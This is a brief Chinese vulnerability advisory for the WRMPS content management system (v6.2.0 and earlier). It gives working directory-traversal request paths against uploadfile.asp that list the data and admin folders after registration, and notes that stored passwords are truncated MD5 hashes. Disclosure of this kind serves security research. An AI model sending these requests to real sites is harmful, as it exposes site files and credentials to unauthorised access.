影响版本:
WRMPS =< v 6.2.0
漏洞描述:
WRMPS 是一个高效的内容管理解决方案,是数十万地方生活门户、行业门户及分类信息站点首选技术品牌! 注册 - 列目录 Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/data Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/admin 这个利用不大 ,密码只取MD5前十位.
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/data Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/admin
安全建议:
暂无,等待官方补丁 http://www.wangren.net/
0 条评论。